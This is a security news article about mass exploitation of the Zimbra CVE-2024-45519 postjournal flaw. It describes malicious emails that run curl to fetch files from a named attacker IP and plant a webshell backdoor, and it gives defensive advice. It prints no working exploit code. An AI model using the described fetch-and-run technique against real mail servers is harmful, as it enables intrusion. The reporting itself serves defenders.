A critical vulnerability in Zimbra mail servers (CVE-2024-45519) has been actively exploited by attackers to remotely execute malicious commands.
Attacks were described as "mass exploitation" and used malicious emails sent from a single IP address to install a backdoor.
The damage from ongoing exploitation is likely to be contained, with payloads not doing anything but downloading files.
Exploitation attempts are indiscriminate but easy, and the reliability of the attacks is unclear.
Defenders should monitor odd CC/To addresses and logs for outbound connections to remote IP addresses.
A patch has been released by Zimbra, and a proof-of-concept exploit has been created, but its reliability is uncertain.
A critical vulnerability in mail servers sold by Zimbra has been actively exploited by attackers, who are attempting to remotely execute malicious commands that install a backdoor. The vulnerability, tracked as CVE-2024-45519, resides in the Zimbra email and collaboration server used by medium and large organizations. When an admin manually changes default settings to enable the postjournal service, attackers can execute commands by sending maliciously formed emails to an address hosted on the server.
According to security researcher Ivan Kwiatkowski, who first reported the in-the-wild attacks, they described as "mass exploitation." He stated that the malicious emails were sent by the IP address 79.124.49[.]86 and when successful, attempted to run a file hosted there using the tool known as curl. Researchers from security firm Proofpoint took to social media later that day to confirm the report.
On Wednesday, security researchers provided additional details that suggested the damage from ongoing exploitation was likely to be contained. Security researcher Ron Bowes reported that the "payload doesn't actually do anything—it downloads a file (to stdout) but doesn't do anything with it." He also stated that in the span of about an hour earlier Wednesday, his honey pot server received roughly 500 requests.
Another researcher at Proofpoint, Greg Lesnewich, provided more details on the attacks. He stated that while the exploitation attempts were indiscriminate in targeting, they had not seen a large volume of exploitation attempts. Based on what they had researched and observed, exploitation of this vulnerability was very easy, but they did not have any information about how reliable the exploitation was.
Lesnewich also mentioned that exploitation had remained about the same since it first appeared on September 28th, with some variability in the number of attacks received by Proofpoint's honeypot servers. He noted that there was a PoC available for the exploit and that the attack attempts seemed opportunistic. The fact that the attacker used the same server to send the exploit emails and host second-stage payloads suggested that they did not have a distributed set of infrastructure to send exploit emails and handle infections after successful exploitation.
Defenders protecting Zimbra appliances should be aware of odd CC or To addresses that look malformed or contain suspicious strings, as well as logs from the Zimbra server indicating outbound connections to remote IP addresses. Proofpoint has also warned that some of the malicious emails used multiple email addresses that, when pasted into the CC field, attempted to install a webshell-based backdoor on vulnerable Zimbra servers.
The researchers at Project Discovery reverse-engineered the patch released by Zimbra and released a proof-of-concept exploit that demonstrated how it worked. However, their test of the vulnerability in their lab showed that the exploitation was not reliable. Despite this, CVE-2024-45519 remains a potential threat since attacks often improve over time as more people test them.
In light of these findings, all Zimbra users should install the patch as soon as practical and ensure that postjournal is turned on only when it's needed. The reliability of exploiting this vulnerability raises questions about whether it can be considered a serious attack or just a minor issue.